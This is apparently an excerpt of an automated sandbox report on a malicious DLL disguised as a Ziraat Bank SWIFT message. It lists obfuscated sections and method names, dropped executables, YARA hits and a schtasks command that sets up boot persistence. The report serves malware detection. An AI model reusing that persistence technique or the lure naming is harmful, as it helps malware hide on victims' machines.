                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: mC6u2Nr
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 1jPrI
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: H
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: H
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: uZp
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Top
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: ek5b
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: EhBgBta
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: El
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Xr
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: xJvDR
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC835C9 push rdi; ret 5_2_6BC835D9
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC8A70E push B2BD6868h; ret 5_2_6BC8A717
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC87507 push rdx; ret 5_2_6BC8751D
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC878DC push rdi; iretd 5_2_6BC8790C
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC83AE9 push rdx; ret 5_2_6BC83AF6
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC838FB push C3686868h; ret 5_2_6BC83900
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC87484 push rdi; ret 5_2_6BC8748C
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC83A90 push rsi; iretd 5_2_6BC83AA7
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC87AA6 push rbx; iretd 5_2_6BC87AA7
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC838BC push 1EA16868h; iretd 5_2_6BC838C1
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC85274 push 8E8E8E05h; ret 5_2_6BC85282
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC89274 push 8E8E8E05h; ret 5_2_6BC89282
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC8D419 push rdi; ret 5_2_6BC8D41A
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07228C13 push esp; retf 13_2_07228C19
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_092885FF push es; ret 15_2_09288610
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F1275 push edi; ret 27_2_030F1282
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F71270 push edi; ret 32_2_00F71282
                  Source: regasms.exe.5.drStatic PE information: section name: .text entropy: 7.43247692930151
                  Source: AtkzppDHiyvcIR.exe.13.drStatic PE information: section name: .text entropy: 7.43247692930151
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, pPlAdEQSYpDd771yMR.cs | High entropy of concatenated method names: 'GJ2e8O9WSR', 'L05eW5x3WJ', 'NWwe73UH4A', 'gxreqrYfn3', 'symejgxmdU', 't47er3aClP', 'q39ecaO97s', 'mLneTK9lNO', 'TiJeO0ASmI', 'XskeiAjEMn'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, LDXlpFAqBajZBU222I.cs | High entropy of concatenated method names: 'vjDgNvwIp2', 'nYJgfbqiQH', 'nWi37bdOEc', 'VhG3qetgG4', 'fAH3jKy4Dw', 'uyG3r1YKcE', 'nkr3cPpiRV', 'lyg3TiJjWI', 'b6m3Oaqvhi', 'IV03ielHWN'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, TwokIEltYOXQBakKStv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VBh5edv1Kq', 'Fmm50ELyvA', 'g715GGFcZ2', 'MZX55Bjrkd', 'QRG5VwaxAu', 'J4o5uZQiwK', 'Thv5BiNZap'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, Stad2JlEpOAw2rQm4DY.cs | High entropy of concatenated method names: 'efRGS5nSEG', 'qPvGzIZG8s', 'asB5pXxqHH', 'fsx1WjXQt9OPOyaC5hL', 'ryvAjFXjWacrp7pxeGT', 'pwKjj7XWv8SMpBgFR37', 'hI5bteXKji6ROYuo1y4', 'TxHb07X2D6UwZOe9mfb'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, lVRdylhA8jubWD8j1x.cs | High entropy of concatenated method names: 'NM3nxkUWFm', 'PcGnac2aU9', 'eP5nUfr2dd', 'bUdnM0VYTR', 'umfnCceuEM', 'Lgjn624QPu', 'voZn21rJLP', 'INwnyFECkV', 'ObsnQOJUHu', 'vktnS7yh64'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, CwmuZm6sBnW94miKIt.cs | High entropy of concatenated method names: 'ffMvywpovS', 'sLtvSLC6dB', 'LZXdpOMorr', 'NTHdlO0Zbq', 'DSnvIUt61S', 'JKtvROwpye', 'rdUvYFkbfa', 'r8Tvxmf9NA', 'T2ovaBJ4wV', 'HlbvUUgBcx'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, VBsLArMNoElOWcGENd.cs | High entropy of concatenated method names: 'D2bvL88Qp0', 'MPPv4mFxV8', 'ToString', 'fdvvXHEL1n', 'WJKvn5GLXd', 'KsNv3avZ44', 'sDSvgfxCWs', 'ucAv1MLh7S', 'E3tvJBYMV3', 'jx9vs7UR3h'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, npbdMh9ZYDjxE108vq.cs | High entropy of concatenated method names: 'X6OkWeI5Z', 'WJrbVPoSB', 'kOBDB3kTB', 'jtUf9vcom', 'b5SmyG2pU', 'uKDAtsdap', 'sOX4eZ5ql3pFuv1lGM', 'kq3U3Hq30lf2bHJqVa', 'NdRdLq3uw', 'hZE0iCtCn'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, yaU42illrHtYtTMVKhc.cs | High entropy of concatenated method names: 'fHI0SXjXYT', 'qwM0z4sGd4', 'EggGp7hxrt', 'EAvGlQsnGe', 'bmkG9vYLXJ', 'IRGGE6jNMD', 'KhUGtEappQ', 'peLGZiGvaD', 'puVGX8RaCl', 'cuuGnyD83H'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, wK8RGwY2TSdWw0MbWi.cs | High entropy of concatenated method names: 'KnPHhw513M', 'T8yHmoh9eZ', 'XIEH8r9XX0', 'vvJHWYN3Xu', 'vFHHqI3ylf', 'OqOHj5SZol', 'HEfHce1EXV', 'OQJHTnYN8g', 'Y5EHiU4gyc', 'NUeHIJCsh6'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, raWy8KSnBEG8OkGhsu.cs | High entropy of concatenated method names: 'Ahi03iBHew', 'WO80gLPrFd', 'Vc5016tF9Y', 'jsj0J9UxyQ', 'A7m0ebqWnO', 'kb50sjcNhk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, niY5NKzmET1X3aCafO.cs | High entropy of concatenated method names: 'dth0DV8fxZ', 'F5Z0hLg0gQ', 'AU90mEsfx9', 'aHs08RdtoK', 'H7Y0W92Jwe', 'wA10qyXepC', 'CdX0jhB3vR', 'BO80BILVom', 'ewq0ohb5G3', 'hr60FQMB9T'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, Uj2lPi2fHvRsqtTgiJ.cs | High entropy of concatenated method names: 'pd5eKsqkfv', 'rIBevt86Ys', 'tyNeeIxNjV', 'FdLeGY7xiM', 'h1geVmp7Zt', 'VjyeBLcTU8', 'Dispose', 'QX4dXCas6A', 'KghdnhkAss', 'JIHd3urtWL'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, blTGy1n8gTX83m6JaG.cs | High entropy of concatenated method names: 'Dispose', 'qRslQqtTgi', 'OBa9WZhcyD', 'HPEif1OpCb', 'jN5lSBxNkw', 'U14lzZTdba', 'ProcessDialogKey', 'm5w9pPlAdE', 'YYp9lDd771', 'WMR99eaWy8'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, y6ZHmbtF4C8h68N4Sn.cs | High entropy of concatenated method names: 'wGPlJVRdyl', 'F8jlsubWD8', 'E9BlLEghFp', 'QZBl46cDXl', 'S22lK2Iiqv', 'OVwlwVDxJK', 'Yt9GOaFlfgxiF74PLx', 'OUvP8EQLoVSmh0NRb1', 'W1NllJ3PH6', 'eYOlEJn1bg'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, sfIBMmm9BEghFpYZB6.cs | High entropy of concatenated method names: 'Run3bHWN1H', 'FLO3D5CvYF', 'wqY3h3Cm8S', 'pd73mfiNpK', 'COC3KPDWVa', 'cD83w5MHLT', 'vXi3vqMAGF', 'Kke3d4uwpL', 'f6Y3erHsTS', 'IGQ30qcFN9'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, I8lrsDOgbkDxRsBvwr.cs | High entropy of concatenated method names: 'ThRJor0e35', 'wb6JFquv4o', 'CfeJklhhVR', 'TRmJbRRq8G', 'bxAJN34dWU', 'gRUJDG5fya', 'hJAJf5n9mI', 'fPIJhKaltp', 'bYmJmGNtQV', 'otyJA6OK0W'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, OqvIVw8VDxJKNW7onY.cs | High entropy of concatenated method names: 'tt21ZBWmXF', 'k7R1nM6XaS', 'Iny1gbRYdA', 'rV71JYR4RI', 'cvq1sKRU6d', 'e17gCrm8kq', 'A9Rg65AjAV', 'm0Rg2mgo4V', 'hW7gyE0AfG', 'ebJgQivrQS'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.cs | High entropy of concatenated method names: 'Y2PEZDdMVt', 'Va9EXUrBH5', 'ltSEnyrb8X', 'rIGE3cWM6L', 'GHoEg07q3G', 'OdGE15BDrj', 'CNnEJBD49m', 'gs3EsJOTfg', 'ifBEPlSa43', 'FUPELZRqh4'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, VvrwtClpAQXNMyeuTfQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm3X0IB9gYY', 'XPi0RdKHqs', 'PZi0YXQpsg', 'LXs0xkim7B', 'VoJ0ajvegw', 'mbg0UfW8Kn', 'p4s0M2E2tl'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, pPlAdEQSYpDd771yMR.cs | High entropy of concatenated method names: 'GJ2e8O9WSR', 'L05eW5x3WJ', 'NWwe73UH4A', 'gxreqrYfn3', 'symejgxmdU', 't47er3aClP', 'q39ecaO97s', 'mLneTK9lNO', 'TiJeO0ASmI', 'XskeiAjEMn'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, LDXlpFAqBajZBU222I.cs | High entropy of concatenated method names: 'vjDgNvwIp2', 'nYJgfbqiQH', 'nWi37bdOEc', 'VhG3qetgG4', 'fAH3jKy4Dw', 'uyG3r1YKcE', 'nkr3cPpiRV', 'lyg3TiJjWI', 'b6m3Oaqvhi', 'IV03ielHWN'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, TwokIEltYOXQBakKStv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VBh5edv1Kq', 'Fmm50ELyvA', 'g715GGFcZ2', 'MZX55Bjrkd', 'QRG5VwaxAu', 'J4o5uZQiwK', 'Thv5BiNZap'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, Stad2JlEpOAw2rQm4DY.cs | High entropy of concatenated method names: 'efRGS5nSEG', 'qPvGzIZG8s', 'asB5pXxqHH', 'fsx1WjXQt9OPOyaC5hL', 'ryvAjFXjWacrp7pxeGT', 'pwKjj7XWv8SMpBgFR37', 'hI5bteXKji6ROYuo1y4', 'TxHb07X2D6UwZOe9mfb'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, lVRdylhA8jubWD8j1x.cs | High entropy of concatenated method names: 'NM3nxkUWFm', 'PcGnac2aU9', 'eP5nUfr2dd', 'bUdnM0VYTR', 'umfnCceuEM', 'Lgjn624QPu', 'voZn21rJLP', 'INwnyFECkV', 'ObsnQOJUHu', 'vktnS7yh64'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, CwmuZm6sBnW94miKIt.cs | High entropy of concatenated method names: 'ffMvywpovS', 'sLtvSLC6dB', 'LZXdpOMorr', 'NTHdlO0Zbq', 'DSnvIUt61S', 'JKtvROwpye', 'rdUvYFkbfa', 'r8Tvxmf9NA', 'T2ovaBJ4wV', 'HlbvUUgBcx'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, VBsLArMNoElOWcGENd.cs | High entropy of concatenated method names: 'D2bvL88Qp0', 'MPPv4mFxV8', 'ToString', 'fdvvXHEL1n', 'WJKvn5GLXd', 'KsNv3avZ44', 'sDSvgfxCWs', 'ucAv1MLh7S', 'E3tvJBYMV3', 'jx9vs7UR3h'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, npbdMh9ZYDjxE108vq.cs | High entropy of concatenated method names: 'X6OkWeI5Z', 'WJrbVPoSB', 'kOBDB3kTB', 'jtUf9vcom', 'b5SmyG2pU', 'uKDAtsdap', 'sOX4eZ5ql3pFuv1lGM', 'kq3U3Hq30lf2bHJqVa', 'NdRdLq3uw', 'hZE0iCtCn'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, yaU42illrHtYtTMVKhc.cs | High entropy of concatenated method names: 'fHI0SXjXYT', 'qwM0z4sGd4', 'EggGp7hxrt', 'EAvGlQsnGe', 'bmkG9vYLXJ', 'IRGGE6jNMD', 'KhUGtEappQ', 'peLGZiGvaD', 'puVGX8RaCl', 'cuuGnyD83H'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, wK8RGwY2TSdWw0MbWi.cs | High entropy of concatenated method names: 'KnPHhw513M', 'T8yHmoh9eZ', 'XIEH8r9XX0', 'vvJHWYN3Xu', 'vFHHqI3ylf', 'OqOHj5SZol', 'HEfHce1EXV', 'OQJHTnYN8g', 'Y5EHiU4gyc', 'NUeHIJCsh6'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, raWy8KSnBEG8OkGhsu.cs | High entropy of concatenated method names: 'Ahi03iBHew', 'WO80gLPrFd', 'Vc5016tF9Y', 'jsj0J9UxyQ', 'A7m0ebqWnO', 'kb50sjcNhk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, niY5NKzmET1X3aCafO.cs | High entropy of concatenated method names: 'dth0DV8fxZ', 'F5Z0hLg0gQ', 'AU90mEsfx9', 'aHs08RdtoK', 'H7Y0W92Jwe', 'wA10qyXepC', 'CdX0jhB3vR', 'BO80BILVom', 'ewq0ohb5G3', 'hr60FQMB9T'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, Uj2lPi2fHvRsqtTgiJ.cs | High entropy of concatenated method names: 'pd5eKsqkfv', 'rIBevt86Ys', 'tyNeeIxNjV', 'FdLeGY7xiM', 'h1geVmp7Zt', 'VjyeBLcTU8', 'Dispose', 'QX4dXCas6A', 'KghdnhkAss', 'JIHd3urtWL'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, blTGy1n8gTX83m6JaG.cs | High entropy of concatenated method names: 'Dispose', 'qRslQqtTgi', 'OBa9WZhcyD', 'HPEif1OpCb', 'jN5lSBxNkw', 'U14lzZTdba', 'ProcessDialogKey', 'm5w9pPlAdE', 'YYp9lDd771', 'WMR99eaWy8'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, y6ZHmbtF4C8h68N4Sn.cs | High entropy of concatenated method names: 'wGPlJVRdyl', 'F8jlsubWD8', 'E9BlLEghFp', 'QZBl46cDXl', 'S22lK2Iiqv', 'OVwlwVDxJK', 'Yt9GOaFlfgxiF74PLx', 'OUvP8EQLoVSmh0NRb1', 'W1NllJ3PH6', 'eYOlEJn1bg'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, sfIBMmm9BEghFpYZB6.cs | High entropy of concatenated method names: 'Run3bHWN1H', 'FLO3D5CvYF', 'wqY3h3Cm8S', 'pd73mfiNpK', 'COC3KPDWVa', 'cD83w5MHLT', 'vXi3vqMAGF', 'Kke3d4uwpL', 'f6Y3erHsTS', 'IGQ30qcFN9'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, I8lrsDOgbkDxRsBvwr.cs | High entropy of concatenated method names: 'ThRJor0e35', 'wb6JFquv4o', 'CfeJklhhVR', 'TRmJbRRq8G', 'bxAJN34dWU', 'gRUJDG5fya', 'hJAJf5n9mI', 'fPIJhKaltp', 'bYmJmGNtQV', 'otyJA6OK0W'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, OqvIVw8VDxJKNW7onY.cs | High entropy of concatenated method names: 'tt21ZBWmXF', 'k7R1nM6XaS', 'Iny1gbRYdA', 'rV71JYR4RI', 'cvq1sKRU6d', 'e17gCrm8kq', 'A9Rg65AjAV', 'm0Rg2mgo4V', 'hW7gyE0AfG', 'ebJgQivrQS'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.cs | High entropy of concatenated method names: 'Y2PEZDdMVt', 'Va9EXUrBH5', 'ltSEnyrb8X', 'rIGE3cWM6L', 'GHoEg07q3G', 'OdGE15BDrj', 'CNnEJBD49m', 'gs3EsJOTfg', 'ifBEPlSa43', 'FUPELZRqh4'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, VvrwtClpAQXNMyeuTfQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm3X0IB9gYY', 'XPi0RdKHqs', 'PZi0YXQpsg', 'LXs0xkim7B', 'VoJ0ajvegw', 'mbg0UfW8Kn', 'p4s0M2E2tl'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, pPlAdEQSYpDd771yMR.cs | High entropy of concatenated method names: 'GJ2e8O9WSR', 'L05eW5x3WJ', 'NWwe73UH4A', 'gxreqrYfn3', 'symejgxmdU', 't47er3aClP', 'q39ecaO97s', 'mLneTK9lNO', 'TiJeO0ASmI', 'XskeiAjEMn'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, LDXlpFAqBajZBU222I.cs | High entropy of concatenated method names: 'vjDgNvwIp2', 'nYJgfbqiQH', 'nWi37bdOEc', 'VhG3qetgG4', 'fAH3jKy4Dw', 'uyG3r1YKcE', 'nkr3cPpiRV', 'lyg3TiJjWI', 'b6m3Oaqvhi', 'IV03ielHWN'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, TwokIEltYOXQBakKStv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VBh5edv1Kq', 'Fmm50ELyvA', 'g715GGFcZ2', 'MZX55Bjrkd', 'QRG5VwaxAu', 'J4o5uZQiwK', 'Thv5BiNZap'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, Stad2JlEpOAw2rQm4DY.cs | High entropy of concatenated method names: 'efRGS5nSEG', 'qPvGzIZG8s', 'asB5pXxqHH', 'fsx1WjXQt9OPOyaC5hL', 'ryvAjFXjWacrp7pxeGT', 'pwKjj7XWv8SMpBgFR37', 'hI5bteXKji6ROYuo1y4', 'TxHb07X2D6UwZOe9mfb'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, lVRdylhA8jubWD8j1x.cs | High entropy of concatenated method names: 'NM3nxkUWFm', 'PcGnac2aU9', 'eP5nUfr2dd', 'bUdnM0VYTR', 'umfnCceuEM', 'Lgjn624QPu', 'voZn21rJLP', 'INwnyFECkV', 'ObsnQOJUHu', 'vktnS7yh64'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, CwmuZm6sBnW94miKIt.cs | High entropy of concatenated method names: 'ffMvywpovS', 'sLtvSLC6dB', 'LZXdpOMorr', 'NTHdlO0Zbq', 'DSnvIUt61S', 'JKtvROwpye', 'rdUvYFkbfa', 'r8Tvxmf9NA', 'T2ovaBJ4wV', 'HlbvUUgBcx'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, VBsLArMNoElOWcGENd.cs | High entropy of concatenated method names: 'D2bvL88Qp0', 'MPPv4mFxV8', 'ToString', 'fdvvXHEL1n', 'WJKvn5GLXd', 'KsNv3avZ44', 'sDSvgfxCWs', 'ucAv1MLh7S', 'E3tvJBYMV3', 'jx9vs7UR3h'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, npbdMh9ZYDjxE108vq.cs | High entropy of concatenated method names: 'X6OkWeI5Z', 'WJrbVPoSB', 'kOBDB3kTB', 'jtUf9vcom', 'b5SmyG2pU', 'uKDAtsdap', 'sOX4eZ5ql3pFuv1lGM', 'kq3U3Hq30lf2bHJqVa', 'NdRdLq3uw', 'hZE0iCtCn'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, yaU42illrHtYtTMVKhc.cs | High entropy of concatenated method names: 'fHI0SXjXYT', 'qwM0z4sGd4', 'EggGp7hxrt', 'EAvGlQsnGe', 'bmkG9vYLXJ', 'IRGGE6jNMD', 'KhUGtEappQ', 'peLGZiGvaD', 'puVGX8RaCl', 'cuuGnyD83H'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, wK8RGwY2TSdWw0MbWi.cs | High entropy of concatenated method names: 'KnPHhw513M', 'T8yHmoh9eZ', 'XIEH8r9XX0', 'vvJHWYN3Xu', 'vFHHqI3ylf', 'OqOHj5SZol', 'HEfHce1EXV', 'OQJHTnYN8g', 'Y5EHiU4gyc', 'NUeHIJCsh6'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, raWy8KSnBEG8OkGhsu.cs | High entropy of concatenated method names: 'Ahi03iBHew', 'WO80gLPrFd', 'Vc5016tF9Y', 'jsj0J9UxyQ', 'A7m0ebqWnO', 'kb50sjcNhk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, niY5NKzmET1X3aCafO.cs | High entropy of concatenated method names: 'dth0DV8fxZ', 'F5Z0hLg0gQ', 'AU90mEsfx9', 'aHs08RdtoK', 'H7Y0W92Jwe', 'wA10qyXepC', 'CdX0jhB3vR', 'BO80BILVom', 'ewq0ohb5G3', 'hr60FQMB9T'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, Uj2lPi2fHvRsqtTgiJ.cs | High entropy of concatenated method names: 'pd5eKsqkfv', 'rIBevt86Ys', 'tyNeeIxNjV', 'FdLeGY7xiM', 'h1geVmp7Zt', 'VjyeBLcTU8', 'Dispose', 'QX4dXCas6A', 'KghdnhkAss', 'JIHd3urtWL'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, blTGy1n8gTX83m6JaG.cs | High entropy of concatenated method names: 'Dispose', 'qRslQqtTgi', 'OBa9WZhcyD', 'HPEif1OpCb', 'jN5lSBxNkw', 'U14lzZTdba', 'ProcessDialogKey', 'm5w9pPlAdE', 'YYp9lDd771', 'WMR99eaWy8'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, y6ZHmbtF4C8h68N4Sn.cs | High entropy of concatenated method names: 'wGPlJVRdyl', 'F8jlsubWD8', 'E9BlLEghFp', 'QZBl46cDXl', 'S22lK2Iiqv', 'OVwlwVDxJK', 'Yt9GOaFlfgxiF74PLx', 'OUvP8EQLoVSmh0NRb1', 'W1NllJ3PH6', 'eYOlEJn1bg'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, sfIBMmm9BEghFpYZB6.cs | High entropy of concatenated method names: 'Run3bHWN1H', 'FLO3D5CvYF', 'wqY3h3Cm8S', 'pd73mfiNpK', 'COC3KPDWVa', 'cD83w5MHLT', 'vXi3vqMAGF', 'Kke3d4uwpL', 'f6Y3erHsTS', 'IGQ30qcFN9'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, I8lrsDOgbkDxRsBvwr.cs | High entropy of concatenated method names: 'ThRJor0e35', 'wb6JFquv4o', 'CfeJklhhVR', 'TRmJbRRq8G', 'bxAJN34dWU', 'gRUJDG5fya', 'hJAJf5n9mI', 'fPIJhKaltp', 'bYmJmGNtQV', 'otyJA6OK0W'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, OqvIVw8VDxJKNW7onY.cs | High entropy of concatenated method names: 'tt21ZBWmXF', 'k7R1nM6XaS', 'Iny1gbRYdA', 'rV71JYR4RI', 'cvq1sKRU6d', 'e17gCrm8kq', 'A9Rg65AjAV', 'm0Rg2mgo4V', 'hW7gyE0AfG', 'ebJgQivrQS'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.cs | High entropy of concatenated method names: 'Y2PEZDdMVt', 'Va9EXUrBH5', 'ltSEnyrb8X', 'rIGE3cWM6L', 'GHoEg07q3G', 'OdGE15BDrj', 'CNnEJBD49m', 'gs3EsJOTfg', 'ifBEPlSa43', 'FUPELZRqh4'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, VvrwtClpAQXNMyeuTfQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm3X0IB9gYY', 'XPi0RdKHqs', 'PZi0YXQpsg', 'LXs0xkim7B', 'VoJ0ajvegw', 'mbg0UfW8Kn', 'p4s0M2E2tl'
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | File created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | File created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                  Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\user\AppData\Roaming\regasms.exe

                  Boot Survival

                  Source: Yara match | File source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
